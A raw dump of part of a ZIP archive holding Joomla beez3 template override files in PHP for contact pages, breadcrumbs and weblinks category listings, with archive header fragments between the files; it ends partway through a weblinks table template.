<?php if (($this->contact->address || $this->contact->suburb  || $this->contact->state || $this->contact->country || $this->contact->postcode) && ($addressCheck = $this->params->get('address_check') > 0)) : ?>
	<?php if ($addressCheck === true) : ?>
	<dt>
		<span class="<?php echo $this->params->get('marker_class'); ?>" >
			<?php echo $this->params->get('marker_address'); ?>
		</span>
	</dt>
	<dd>
	<address>
	<?php endif; ?>
	<?php if ($this->contact->address && $this->params->get('show_street_address')) : ?>
		<span class="contact-street">
			<?php echo nl2br($this->contact->address); ?>
		</span>
	<?php endif; ?>
	<?php if ($this->contact->suburb && $this->params->get('show_suburb')) : ?>
		<span class="contact-suburb">
			<?php echo $this->contact->suburb; ?>
		</span>
	<?php endif; ?>
	<?php if ($this->contact->state && $this->params->get('show_state')) : ?>
		<span class="contact-state">
			<?php echo $this->contact->state; ?>
		</span>
	<?php endif; ?>
	<?php if ($this->contact->postcode && $this->params->get('show_postcode')) : ?>
		<span class="contact-postcode">
			<?php echo $this->contact->postcode; ?>
		</span>
	<?php endif; ?>
	<?php if ($this->contact->country && $this->params->get('show_country')) : ?>
		<span class="contact-country">
			<?php echo $this->contact->country; ?>
		</span>
	<?php endif; ?>
<?php endif; ?>
<?php if ($this->params->get('address_check') > 0) : ?>
	</address>
	</dd>
<?php endif; ?>

<?php if ($this->contact->email_to && $this->params->get('show_email')) : ?>
	<dt>
		<span class="<?php echo $this->params->get('marker_class'); ?>" >
			<?php echo $this->params->get('marker_email'); ?>
		</span>
	</dt>
	<dd>
		<span class="contact-emailto">
			<?php echo $this->contact->email_to; ?>
		</span>
	</dd>
<?php endif; ?>

<?php if ($this->contact->telephone && $this->params->get('show_telephone')) : ?>
	<dt>
		<span class="<?php echo $this->params->get('marker_class'); ?>" >
			<?php echo $this->params->get('marker_telephone'); ?>
		</span>
	</dt>
	<dd>
		<span class="contact-telephone">
			<?php echo nl2br($this->contact->telephone); ?>
		</span>
	</dd>
<?php endif; ?>
<?php if ($this->contact->fax && $this->params->get('show_fax')) : ?>
	<dt>
		<span class="<?php echo $this->params->get('marker_class'); ?>" >
			<?php echo $this->params->get('marker_fax'); ?>
		</span>
	</dt>
	<dd>
		<span class="contact-fax">
		<?php echo nl2br($this->contact->fax); ?>
		</span>
	</dd>
<?php endif; ?>
<?php if ($this->contact->mobile && $this->params->get('show_mobile')) :?>
	<dt>
		<span class="<?php echo $this->params->get('marker_class'); ?>" >
			<?php echo $this->params->get('marker_mobile'); ?>
		</span>
	</dt>
	<dd>
		<span class="contact-mobile">
			<?php echo nl2br($this->contact->mobile); ?>
		</span>
	</dd>
<?php endif; ?>
<?php if ($this->contact->webpage && $this->params->get('show_webpage')) : ?>
	<dt>
		<span class="<?php echo $this->params->get('marker_class'); ?>" >
		</span>
	</dt>
	<dd>
		<span class="contact-webpage">
			<a href="<?php echo $this->contact->webpage; ?>" target="_blank" rel="noopener noreferrer">
			<?php echo $this->contact->webpage; ?></a>
		</span>
	</dd>
<?php endif; ?>
</dl>
PK!<�$3beez3/html/com_contact/contact/default_articles.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_contact
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JLoader::register('ContentHelperRoute', JPATH_SITE . '/components/com_content/helpers/route.php');

?>
<?php if ($this->params->get('show_articles')) : ?>
<div class="contact-articles">

	<ol>
		<?php foreach ($this->item->articles as $article) :	?>
			<li>
				<?php echo JHtml::_('link', JRoute::_(ContentHelperRoute::getArticleRoute($article->slug, $article->catid, $article->language)), htmlspecialchars($article->title, ENT_COMPAT, 'UTF-8')); ?>
			</li>
		<?php endforeach; ?>
	</ol>
</div>
<?php endif; ?>
PK!�l�		*beez3/html/com_contact/contact/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_contact
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$cparams = JComponentHelper::getParams('com_media');
?>

<div class="contact<?php echo $this->pageclass_sfx?>">
	<?php if ($this->params->get('show_page_heading')) : ?>
		<h1>
			<?php echo $this->escape($this->params->get('page_heading')); ?>
		</h1>
	<?php endif; ?>
	<?php if ($this->contact->name && $this->params->get('show_name')) : ?>
		<div class="page-header">
			<h2>
				<span class="contact-name"><?php echo $this->contact->name; ?></span>
			</h2>
		</div>
	<?php endif;  ?>
	<?php if ($this->params->get('show_contact_category') === 'show_no_link') : ?>
		<h3>
			<span class="contact-category"><?php echo $this->contact->category_title; ?></span>
		</h3>
	<?php endif; ?>
	<?php if ($this->params->get('show_contact_category') === 'show_with_link') : ?>
		<?php $contactLink = ContactHelperRoute::getCategoryRoute($this->contact->catid);?>
		<h3>
			<span class="contact-category"><a href="<?php echo $contactLink; ?>">
				<?php echo $this->escape($this->contact->category_title); ?></a>
			</span>
		</h3>
	<?php endif; ?>

	<?php echo $this->item->event->afterDisplayTitle; ?>

	<?php if ($this->params->get('show_contact_list') && count($this->contacts) > 1) : ?>
		<form action="#" method="get" name="selectForm" id="selectForm">
			<label for="select_contact"><?php echo JText::_('COM_CONTACT_SELECT_CONTACT'); ?></label>
			<?php echo JHtml::_('select.genericlist', $this->contacts, 'select_contact', 'class="inputbox" onchange="document.location.href = this.value"', 'link', 'name', $this->contact->link); ?>
		</form>
	<?php endif; ?>

	<?php if (!empty($this->item->tags->itemTags) && $this->params->get('show_tags', 1)) : ?>
		<?php $this->item->tagLayout = new JLayoutFile('joomla.content.tags'); ?>
		<?php echo $this->item->tagLayout->render($this->item->tags->itemTags); ?>
	<?php endif; ?>

	<?php echo $this->item->event->beforeDisplayContent; ?>

	<?php  if ($this->params->get('presentation_style') === 'sliders') : ?>
		<?php echo JHtml::_('sliders.start', 'panel-sliders', array('useCookie' => '1')); ?>
		<?php echo JHtml::_('sliders.panel', JText::_('COM_CONTACT_DETAILS'), 'basic-details'); ?>
	<?php endif; ?>
	<?php  if ($this->params->get('presentation_style') === 'tabs') : ?>
		<?php echo JHtml::_('tabs.start', 'tabs', array('useCookie' => '1')); ?>
		<?php echo JHtml::_('tabs.panel', JText::_('COM_CONTACT_DETAILS'), 'basic-details'); ?>

	<?php endif; ?>
	<?php if ($this->params->get('presentation_style') === 'plain'):?>
		<?php  echo '<h3>' . JText::_('COM_CONTACT_DETAILS') . '</h3>';  ?>
	<?php endif; ?>

	<?php if ($this->contact->image && $this->params->get('show_image')) : ?>
		<div class="thumbnail pull-right">
			<?php echo JHtml::_('image', $this->contact->image, htmlspecialchars($this->contact->name,  ENT_QUOTES, 'UTF-8'), array('style' => 'vertical-align: middle;')); ?>
		</div>
	<?php endif; ?>

	<?php if ($this->contact->con_position && $this->params->get('show_position')) : ?>
		<dl class="contact-position dl-horizontal">
		<dt><?php echo JText::_('COM_CONTACT_POSITION'); ?>:</dt>
			<dd>
				<?php echo $this->contact->con_position; ?>
			</dd>
		</dl>
	<?php endif; ?>

	<?php echo $this->loadTemplate('address'); ?>

	<?php if ($this->params->get('allow_vcard')) :	?>
		<?php echo JText::_('COM_CONTACT_DOWNLOAD_INFORMATION_AS');?>
			<a href="<?php echo JRoute::_('index.php?option=com_contact&amp;view=contact&amp;id='.$this->contact->id . '&amp;format=vcf'); ?>">
			<?php echo JText::_('COM_CONTACT_VCARD');?></a>
	<?php endif; ?>

	<?php if (($this->contact->email_to || $this->contact->user_id) && $this->params->get('show_email_form')) : ?>

		<?php if ($this->params->get('presentation_style') === 'sliders') : ?>
			<?php echo JHtml::_('sliders.panel', JText::_('COM_CONTACT_EMAIL_FORM'), 'display-form'); ?>
		<?php endif; ?>
		<?php if ($this->params->get('presentation_style') === 'tabs') : ?>
			<?php echo JHtml::_('tabs.panel', JText::_('COM_CONTACT_EMAIL_FORM'), 'display-form'); ?>
		<?php endif; ?>
		<?php if ($this->params->get('presentation_style') === 'plain'):?>
			<?php  echo '<h3>'. JText::_('COM_CONTACT_EMAIL_FORM').'</h3>';  ?>
		<?php endif; ?>
		<?php  echo $this->loadTemplate('form');  ?>

	<?php endif; ?>

	<?php if ($this->params->get('show_links')) : ?>
		<?php echo $this->loadTemplate('links'); ?>
	<?php endif; ?>

	<?php if ($this->contact->user_id && $this->contact->articles && $this->params->get('show_articles')) : ?>

		<?php if ($this->params->get('presentation_style') === 'sliders') :
			echo JHtml::_('sliders.panel', JText::_('JGLOBAL_ARTICLES'), 'display-articles'); ?>
		<?php endif; ?>
		<?php if ($this->params->get('presentation_style') === 'tabs') : ?>
			<?php echo JHtml::_('tabs.panel', JText::_('JGLOBAL_ARTICLES'), 'display-articles'); ?>
		<?php endif; ?>
		<?php if  ($this->params->get('presentation_style') === 'plain'):?>
			<?php echo '<h3>'. JText::_('JGLOBAL_ARTICLES').'</h3>'; ?>
		<?php endif; ?>

		<?php echo $this->loadTemplate('articles'); ?>

	<?php endif; ?>

	<?php if ($this->contact->user_id && $this->params->get('show_profile') && JPluginHelper::isEnabled('user', 'profile')) : ?>

		<?php if ($this->params->get('presentation_style') === 'sliders') :
			echo JHtml::_('sliders.panel', JText::_('COM_CONTACT_PROFILE'), 'display-profile'); ?>
		<?php endif; ?>
		<?php if ($this->params->get('presentation_style') === 'tabs') : ?>
			<?php echo JHtml::_('tabs.panel', JText::_('COM_CONTACT_PROFILE'), 'display-profile'); ?>
		<?php endif; ?>
		<?php if ($this->params->get('presentation_style') === 'plain'):?>
			<?php echo '<h3>'. JText::_('COM_CONTACT_PROFILE').'</h3>'; ?>
		<?php endif; ?>

		<?php echo $this->loadTemplate('profile'); ?>

	<?php endif; ?>

	<?php if ($this->contactUser && $this->params->get('show_user_custom_fields')) : ?>
		<?php echo $this->loadTemplate('user_custom_fields'); ?>
	<?php endif; ?>

	<?php if ($this->contact->misc && $this->params->get('show_misc')) : ?>

		<?php if ($this->params->get('presentation_style') === 'sliders') :
			echo JHtml::_('sliders.panel', JText::_('COM_CONTACT_OTHER_INFORMATION'), 'display-misc'); ?>
		<?php endif; ?>
		<?php if ($this->params->get('presentation_style') === 'tabs') : ?>
			<?php echo JHtml::_('tabs.panel', JText::_('COM_CONTACT_OTHER_INFORMATION'), 'display-misc'); ?>
		<?php endif; ?>
		<?php if ($this->params->get('presentation_style') === 'plain'):?>
			<?php echo '<h3>'. JText::_('COM_CONTACT_OTHER_INFORMATION').'</h3>'; ?>
		<?php endif; ?>

		<div class="contact-miscinfo">
			<dl class="dl-horizontal">
				<dt>
					<span class="<?php echo $this->params->get('marker_class'); ?>">
						<?php echo $this->params->get('marker_misc'); ?>
					</span>
				</dt>
				<dd>
					<span class="contact-misc">
						<?php echo $this->contact->misc; ?>
					</span>
				</dd>
			</dl>
		</div>
	<?php endif; ?>

	<?php if ($this->params->get('presentation_style') === 'sliders') : ?>
		<?php echo JHtml::_('sliders.end'); ?>
	<?php elseif ($this->params->get('presentation_style') === 'tabs') : ?>
		<?php echo JHtml::_('tabs.end'); ?>
	<?php endif; ?>

	<?php echo $this->item->event->afterDisplayContent; ?>
</div>
PK!c���

/beez3/html/com_contact/contact/default_form.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_contact
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::_('behavior.keepalive');
JHtml::_('behavior.formvalidation');

if (isset($this->error)) : ?>
	<div class="contact-error">
		<?php echo $this->error; ?>
	</div>
<?php endif; ?>

<div class="contact-form">
	<form id="contact-form" action="<?php echo JRoute::_('index.php'); ?>" method="post" class="form-validate form-horizontal">
		<fieldset>
			<legend><?php echo JText::_('COM_CONTACT_FORM_LABEL'); ?></legend>
			<div class="control-group">
				<div class="control-label"><?php echo $this->form->getLabel('contact_name'); ?></div>
				<div class="controls"><?php echo $this->form->getInput('contact_name'); ?></div>
			</div>
			<div class="control-group">
				<div class="control-label"><?php echo $this->form->getLabel('contact_email'); ?></div>
				<div class="controls"><?php echo $this->form->getInput('contact_email'); ?></div>
			</div>
			<div class="control-group">
				<div class="control-label"><?php echo $this->form->getLabel('contact_subject'); ?></div>
				<div class="controls"><?php echo $this->form->getInput('contact_subject'); ?></div>
			</div>
			<div class="control-group">
				<div class="control-label"><?php echo $this->form->getLabel('contact_message'); ?></div>
				<div class="controls"><?php echo $this->form->getInput('contact_message'); ?></div>
			</div>
				<?php if ($this->params->get('show_email_copy', 0)){ ?>
					<div class="control-group">
						<div class="control-label"><?php echo $this->form->getLabel('contact_email_copy'); ?></div>
						<div class="controls"><?php echo $this->form->getInput('contact_email_copy'); ?></div>
					</div>
				<?php } ?>
			<?php //Dynamically load any additional fields from plugins. ?>
				<?php foreach ($this->form->getFieldsets() as $fieldset) : ?>
					<?php if ($fieldset->name !== 'contact'):?>
						<?php $fields = $this->form->getFieldset($fieldset->name);?>
						<?php foreach ($fields as $field) : ?>
							<div class="control-group">
								<?php if ($field->hidden) : ?>
									<div class="controls">
									 <?php echo $field->input;?>
									</div>
								<?php else:?>
									<div class="control-label">
										<?php echo $field->label; ?>
										<?php if (!$field->required && $field->type !== 'Spacer') : ?>
											<span class="optional"><?php echo JText::_('COM_CONTACT_OPTIONAL');?></span>
										<?php endif; ?>
									</div>
									<div class="controls"><?php echo $field->input;?></div>
								<?php endif;?>
							</div>
						<?php endforeach;?>
					<?php endif ?>
				<?php endforeach;?>
				<div class="form-actions"><button class="btn btn-primary validate" type="submit"><?php echo JText::_('COM_CONTACT_CONTACT_SEND'); ?></button>
					<input type="hidden" name="option" value="com_contact" />
					<input type="hidden" name="task" value="contact.submit" />
					<input type="hidden" name="return" value="<?php echo $this->return_page;?>" />
					<input type="hidden" name="id" value="<?php echo $this->contact->slug; ?>" />
					<?php echo JHtml::_('form.token'); ?>
				</div>
		</fieldset>
	</form>
</div>
PK!gymd��/beez3/html/com_contact/contact/encyclopedia.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$cparams = JComponentHelper::getParams('com_media');
?>
<div class="contact<?php echo $this->pageclass_sfx?>">
		<?php $contactLink = ContactHelperRoute::getCategoryRoute($this->contact->catid);?>
		<h3>
			<span class="contact-category"><a href="<?php echo $contactLink; ?>">
				<?php echo $this->escape($this->contact->category_title); ?></a>
			</span>
		</h3>
	<?php if ($this->contact->name && $this->params->get('show_name')) : ?>
		<h2>
			<span class="contact-name"><?php echo $this->contact->name; ?></span>
		</h2>
	<?php endif;  ?>

	<?php echo $this->item->event->afterDisplayTitle; ?>

	<?php echo $this->item->event->beforeDisplayContent; ?>

	<div class="encyclopedia_col1">
		<?php if ($this->contact->image ) : ?>
			<div class="contact-image">
			<?php // We are going to use the contact address field for the main image caption.
				// If we have a caption load the caption behavior. ?>
			<?php if ($this->contact->address)
			{
				JHtml::_('behavior.caption');
			}?>
				<?php echo JHtml::_('image', $this->contact->image, $this->contact->name, array('align' => 'middle', 'class' => 'caption', 'title' => $this->contact->address)); ?>
			</div>
		<?php endif; ?>
	</div>
	<div class="encyclopedia_col2">
		<?php // We are going to use some of the standard content fields in non standard ways. ?>
				<div class="contact-miscinfo">

						<div class="contact-misc">
							<?php echo $this->contact->misc; ?>
						</div>
					</div>


		<?php //Let's use position for the scientific name. ?>
		<?php if ($this->contact->con_position && $this->params->get('show_position')) : ?>
			<p class="contact-position"><?php echo $this->contact->con_position; ?></p>
		<?php endif; ?>
		<?php //Let's use state to put the family name.  ?>
		<?php if ($this->contact->state && $this->params->get('show_state')) : ?>
			<p class="contact-state"><?php echo $this->contact->state; ?></p>
		<?php endif; ?>
		<?php // Let's use country to list the main countries it grows in. ?>
		<?php if ($this->contact->country && $this->params->get('show_country')) : ?>
			<p class="contact-country"><?php echo $this->contact->country; ?></p>
		<?php endif; ?>
	</div>

<div class="clr"> </div>
	<?php  if ($this->params->get('presentation_style') !== 'plain'):?>
		<?php  echo  JHtml::_($this->params->get('presentation_style').'.start', 'contact-slider'); ?>
	<?php endif ?>
<div class="encyclopedia_links">
<?php echo $this->loadTemplate('links'); ?>

</div>
	<?php if ($this->params->get('presentation_style') !== 'plain'):?>
			<?php echo JHtml::_($this->params->get('presentation_style').'.end'); ?>
			<?php endif; ?>
</div>
<?php echo $this->item->event->afterDisplayContent; ?>
PK!�;���=beez3/html/com_contact/contact/default_user_custom_fields.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_contact
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$params             = $this->params;

$displayGroups      = $params->get('show_user_custom_fields');
$userFieldGroups    = array();
?>

<?php if (!$displayGroups || !$this->contactUser) : ?>
	<?php return; ?>
<?php endif; ?>

<?php foreach ($this->contactUser->jcfields as $field) :?>
	<?php if (!in_array('-1', $displayGroups) && (!$field->group_id || !in_array($field->group_id, $displayGroups))) : ?>
		<?php continue; ?>
	<?php endif; ?>
	<?php if (!array_key_exists($field->group_title, $userFieldGroups)) : ?>
		<?php $userFieldGroups[$field->group_title] = array();?>
	<?php endif; ?>
	<?php $userFieldGroups[$field->group_title][] = $field;?>
<?php endforeach; ?>

<?php foreach ($userFieldGroups as $groupTitle => $fields) :?>
	<?php $id = JApplicationHelper::stringURLSafe($groupTitle); ?>
	<?php if ($this->params->get('presentation_style') === 'sliders') :
		echo JHtml::_('sliders.panel', $groupTitle ?: JText::_('COM_CONTACT_USER_FIELDS'), 'display-' . $id); ?>
	<?php endif; ?>
	<?php if ($this->params->get('presentation_style') === 'tabs') : ?>
		<?php echo JHtml::_('tabs.panel', $groupTitle ?: JText::_('COM_CONTACT_USER_FIELDS'), 'display-' . $id); ?>
	<?php endif; ?>
	<?php if ($this->params->get('presentation_style') === 'plain'):?>
		<?php echo '<h3>' . ($groupTitle ?: JText::_('COM_CONTACT_USER_FIELDS')) . '</h3>'; ?>
	<?php endif; ?>

	<div class="contact-profile" id="user-custom-fields-<?php echo $id; ?>">
		<dl class="dl-horizontal">
		<?php foreach ($fields as $field) :?>
			<?php if (!$field->value) : ?>
				<?php continue; ?>
			<?php endif; ?>

			<?php echo '<dt>' . $field->label . '</dt>'; ?>
			<?php echo '<dd>' . $field->value . '</dd>'; ?>
		<?php endforeach; ?>
		</dl>
	</div>

<?php endforeach; ?>
PK!7�?�DD0beez3/html/com_contact/contact/default_links.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_contact
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

if ($this->params->get('presentation_style') === 'sliders') : ?>
	<?php echo JHtml::_('sliders.panel', JText::_('COM_CONTACT_LINKS'), 'display-links'); ?>
<?php endif; ?>
<?php if ($this->params->get('presentation_style') === 'tabs') : ?>
	<?php echo JHtml::_('tabs.panel', JText::_('COM_CONTACT_LINKS'), 'display-links'); ?>
<?php endif; ?>
<?php if  ($this->params->get('presentation_style') === 'plain'):?>
	<?php echo '<h3>'. JText::_('COM_CONTACT_LINKS').'</h3>'; ?>
<?php endif; ?>

<div class="contact-links">
	<ul class="nav nav-list">
		<?php foreach (range('a', 'e') as $char) :// letters 'a' to 'e'
			$link = $this->contact->params->get('link'.$char);
			$label = $this->contact->params->get('link'.$char.'_name');

			if (!$link) :
				continue;
			endif;

			// Add 'http://' if not present
			$link = (0 === strpos($link, 'http')) ? $link : 'http://'.$link;

			// If no label is present, take the link
			$label = $label ?: $link;
			?>
			<li>
				<a href="<?php echo $link; ?>">
					<?php echo $label; ?>
				</a>
			</li>
		<?php endforeach; ?>
	</ul>
</div>
PK!
��|��&beez3/html/mod_breadcrumbs/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
?>

<div class = "breadcrumbs<?php echo $moduleclass_sfx; ?>">
<?php if ($params->get('showHere', 1))
	{
		echo '<span class="showHere">' .JText::_('MOD_BREADCRUMBS_HERE').'</span>';
	}

	// Get rid of duplicated entries on trail including home page when using multilanguage
	for ($i = 0; $i < $count; $i++)
	{
		if ($i === 1 && !empty($list[$i]->link) && !empty($list[$i - 1]->link) && $list[$i]->link === $list[$i - 1]->link)
		{
			unset($list[$i]);
		}
	}

	// Find last and penultimate items in breadcrumbs list
	end($list);
	$last_item_key = key($list);
	prev($list);
	$penult_item_key = key($list);

	// Generate the trail
	foreach ($list as $key => $item) :
	// Make a link if not the last item in the breadcrumbs
	$show_last = $params->get('showLast', 1);
	if ($key !== $last_item_key)
	{
		// Render all but last item - along with separator
		if (!empty($item->link))
		{
			echo '<a href="' . $item->link . '" class="pathway">' . $item->name . '</a>';
		}
		else
		{
			echo '<span>' . $item->name . '</span>';
		}

		if ($key !== $penult_item_key || $show_last)
		{
			echo ' '.$separator.' ';
		}

	}
	elseif ($show_last)
	{
		// Render last item if reqd.
		echo '<span>' . $item->name . '</span>';
	}
	endforeach; ?>
</div>
PK!mi���4beez3/html/com_weblinks/categories/default_items.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_weblinks
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$class = ' class="first"';
if ($this->maxLevelcat != 0 && count($this->items[$this->parent->id]) > 0) :
?>
<ul>
<?php foreach ($this->items[$this->parent->id] as $id => $item) : ?>
	<?php
	if ($item->numitems || $this->params->get('show_empty_categories_cat') || count($item->getChildren())) :
	if (!isset($this->items[$this->parent->id][$id + 1]))
	{
		$class = ' class="last"';
	}
	?>
	<li<?php echo $class; ?>>
	<?php $class = ''; ?>
		<span class="item-title"><a href="<?php echo JRoute::_(WeblinksHelperRoute::getCategoryRoute($item->id)); ?>">
			<?php echo $this->escape($item->title); ?></a>
		</span>
		<?php if ($this->params->get('show_subcat_desc_cat') == 1) : ?>
		<?php if ($item->description) : ?>
			<div class="category-desc">
				<?php echo JHtml::_('content.prepare', $item->description, '', 'com_weblinks.categories'); ?>
			</div>
		<?php endif; ?>
		<?php endif; ?>
		<?php if ($this->params->get('show_cat_num_links_cat') == 1) : ?>
			<dl class="weblink-count"><dt>
				<?php echo JText::_('COM_WEBLINKS_NUM'); ?></dt>
				<dd><?php echo $item->numitems; ?></dd>
			</dl>
		<?php endif; ?>

		<?php if (count($item->getChildren()) > 0) :
			$this->items[$item->id] = $item->getChildren();
			$this->parent = $item;
			$this->maxLevelcat--;
			echo $this->loadTemplate('items');
			$this->parent = $item->getParent();
			$this->maxLevelcat++;
		endif; ?>

	</li>
	<?php endif; ?>
<?php endforeach; ?>
</ul>
<?php endif; ?>
PK!@t�55.beez3/html/com_weblinks/categories/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_weblinks
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::addIncludePath(JPATH_COMPONENT.'/helpers');
JHtml::_('behavior.caption');
?>
<div class="categories-list<?php echo $this->pageclass_sfx;?>">
<?php if ($this->params->get('show_page_heading')) : ?>
<h1>
	<?php echo $this->escape($this->params->get('page_heading')); ?>
</h1>
<?php endif; ?>

<?php if ($this->params->get('show_base_description')) : ?>
	<?php 	//If there is a description in the menu parameters use that; ?>
		<?php if ($this->params->get('categories_description')) : ?>
			<div class="category-desc base-desc">
			<?php echo JHtml::_('content.prepare', $this->params->get('categories_description'), '', 'com_weblinks.categories'); ?>
			</div>
		<?php  else: ?>
			<?php //Otherwise get one from the database if it exists. ?>
			<?php  if ($this->parent->description) : ?>
				<div class="category-desc base-desc">
					<?php echo JHtml::_('content.prepare', $this->parent->description, '', 'com_weblinks.categories'); ?>
				</div>
			<?php  endif; ?>
		<?php  endif; ?>
	<?php endif; ?>
<?php
echo $this->loadTemplate('items');
?>
</div>
PK!Jޚpp,beez3/html/com_weblinks/category/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_weblinks
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::addIncludePath(JPATH_COMPONENT.'/helpers');
JHtml::_('behavior.caption');
?>
<div class="weblink-category<?php echo $this->pageclass_sfx;?>">
<?php if ($this->params->get('show_page_heading')) : ?>
<h1>
	<?php echo $this->escape($this->params->get('page_heading')); ?>
</h1>
<?php endif; ?>
<?php if ($this->params->get('show_category_title', 1)) : ?>
<h2>
	<?php echo JHtml::_('content.prepare', $this->category->title, '', 'com_weblinks.category.title'); ?>
</h2>
<?php endif; ?>
<?php if ($this->params->get('show_description', 1) || $this->params->def('show_description_image', 1)) : ?>
	<div class="category-desc">
	<?php if ($this->params->get('show_description_image') && $this->category->getParams()->get('image')) : ?>
		<img src="<?php echo $this->category->getParams()->get('image'); ?>"/>
	<?php endif; ?>
	<?php if ($this->category->description && $this->params->get('show_description')) : ?>
		<?php echo JHtml::_('content.prepare', $this->category->description, '', 'com_weblinks.category'); ?>
	<?php endif; ?>
	<div class="clr"></div>
	</div>
<?php endif; ?>
<?php echo $this->loadTemplate('items'); ?>
<?php if ($this->maxLevel != 0 && !empty($this->children[$this->category->id])) : ?>
	<div class="cat-children">
	<h3><?php echo JText::_('JGLOBAL_SUBCATEGORIES'); ?></h3>
	<?php echo $this->loadTemplate('children'); ?>
	</div>
<?php endif; ?>
</div>
PK!KY#���5beez3/html/com_weblinks/category/default_children.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_weblinks
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$class = ' class="first"';
if ($this->maxLevel != 0 && count($this->children[$this->category->id]) > 0) :
?>
<ul>
<?php foreach ($this->children[$this->category->id] as $id => $child) : ?>
	<?php
	if ($child->numitems || $this->params->get('show_empty_categories') || count($child->getChildren())) :
	if (!isset($this->children[$this->category->id][$id + 1]))
	{
		$class = ' class="last"';
	}
	?>
	<li<?php echo $class; ?>>
		<?php $class = ''; ?>
			<span class="item-title"><a href="<?php echo JRoute::_(WeblinksHelperRoute::getCategoryRoute($child->id)); ?>">
				<?php echo $this->escape($child->title); ?></a>
			</span>

			<?php if ($this->params->get('show_subcat_desc') == 1) : ?>
			<?php if ($child->description) : ?>
				<div class="category-desc">
					<?php echo JHtml::_('content.prepare', $child->description, '', 'com_weblinks.category'); ?>
				</div>
			<?php endif; ?>
			<?php endif; ?>

			<?php if ($this->params->get('show_cat_num_links') == 1) : ?>
				<dl class="weblink-count"><dt>
					<?php echo JText::_('COM_WEBLINKS_NUM'); ?></dt>
					<dd><?php echo $child->numitems; ?></dd>
				</dl>
			<?php endif; ?>

			<?php if (count($child->getChildren()) > 0 ) :
				$this->children[$child->id] = $child->getChildren();
				$this->category = $child;
				$this->maxLevel--;
				echo $this->loadTemplate('children');
				$this->category = $child->getParent();
				$this->maxLevel++;
			endif; ?>
		</li>
	<?php endif; ?>
	<?php endforeach; ?>
	</ul>
<?php endif;
PK!�,���2beez3/html/com_weblinks/category/default_items.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_weblinks
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

// Code to support edit links for weblinks
JHtml::addIncludePath(JPATH_COMPONENT.'/helpers/html');
JHtml::_('behavior.framework');

// Get the user object.
$user = JFactory::getUser();

// Check if user is allowed to add/edit based on weblinks permissinos.
$canEdit      = $user->authorise('core.edit', 'com_weblinks');
$canCreate    = $user->authorise('core.create', 'com_weblinks');
$canEditState = $user->authorise('core.edit.state', 'com_weblinks');
$n            = count($this->items);
$listOrder    = $this->escape($this->state->get('list.ordering'));
$listDirn     = $this->escape($this->state->get('list.direction'));
?>

<?php if (empty($this->items)) : ?>
	<p> <?php echo JText::_('COM_WEBLINKS_NO_WEBLINKS'); ?></p>
<?php else : ?>

<form action="<?php echo htmlspecialchars(JUri::getInstance()->toString(), ENT_COMPAT, 'UTF-8'); ?>" method="post" name="adminForm" id="adminForm">
	<?php if ($this->params->get('show_pagination_limit')) : ?>
		<fieldset class="filters">
		<legend class="hidelabeltxt"><?php echo JText::_('JGLOBAL_FILTER_LABEL'); ?></legend>
		<div class="display-limit">
			<?php echo JText::_('JGLOBAL_DISPLAY_NUM'); ?>&#160;
			<?php echo $this->pagination->getLimitBox(); ?>
		</div>
		<input type="hidden" name="filter_order" value="<?php echo $listOrder; ?>" />
		<input type="hidden" name="filter_order_Dir" value="<?php echo $listDirn; ?>" />
		</fieldset>
	<?php endif; ?>

	<table class="category">
		<?php if ($this->params->get('show_headings') == 1) : ?>

		<thead><tr>

			<th class="title">
					<?php echo JHtml::_('grid.sort',  'COM_WEBLINKS_GRID_TITLE', 'title', $listDirn, $listOrder); ?>
			</th>
